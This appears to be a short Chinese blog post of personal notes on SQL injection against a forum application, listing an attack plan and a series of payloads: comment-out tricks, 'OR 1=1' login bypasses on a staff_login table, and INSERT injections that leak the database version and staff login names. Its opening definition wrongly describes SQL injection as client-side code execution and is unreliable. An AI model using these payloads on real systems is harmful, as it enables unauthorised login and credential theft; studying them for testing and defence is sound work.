SQL注入,就是把恶意代码传送给伺服器。
客户端运行时,自动把恶意代码执行。
这是一个论坛系统。
攻击思路:
1. 检查所有可用的标签和符号。
2. 尝试搞清楚SQL的表格,和php业务逻辑。
3. 提交恶意代码,或恶意SQL语法。
SELECT * FROM posts WHERE postId = 38
SELECT * FROM posts -- WHERE postId = 38
SELECT * FROM staff_login WHERE staffId = 32
SELECT * FROM staff_login WHERE staffId = 32 OR 1 = 1
SELECT * FROM staff_login WHERE staffLoginName = 'kk' AND staffPassword = '1234' OR 1=1 --
1234' OR 1 =1-- OR 1=1'
1234' OR 1 =1-- OR 1=1
1234' OR 1 =1—‘
SELECT *
FROM staff_login
WHERE staffLoginName = '123'
AND staffPassword = '1234'
OR 1 =1-- OR 1=1'
INSERT INTO posts (postTitle, postMessage, postTime) VALUES ('123', (select version()) , '123')
23', (SELECT version() limit 1,1) , '123') -- OR 1=1
INSERT INTO posts (postTitle, postMessage, postTime) VALUES ('123', '123', '123') -- OR 1=1', '2017-04-15')
INSERT INTO posts (postTitle, postMessage, postTime) VALUES ('123', (SELECT staffLoginName FROM staff_login WHERE staffId = 3) , '123')
INSERT INTO posts (postTitle, postMessage, postTime) VALUES ('123', (SELECT staffLoginName FROM staff_login WHERE staffId = 4 LIMIT 0 , 1) , '123') -- OR 1=1', '123', '2017-04-15')
INSERT INTO posts (postTitle, postMessage, postTime) VALUES ('123', (SELECT staffLoginName FROM staff_login LIMIT 0 , 1) , '123') -- OR 1=1', '123', '2017-04-15')
留言列表
日記 (2)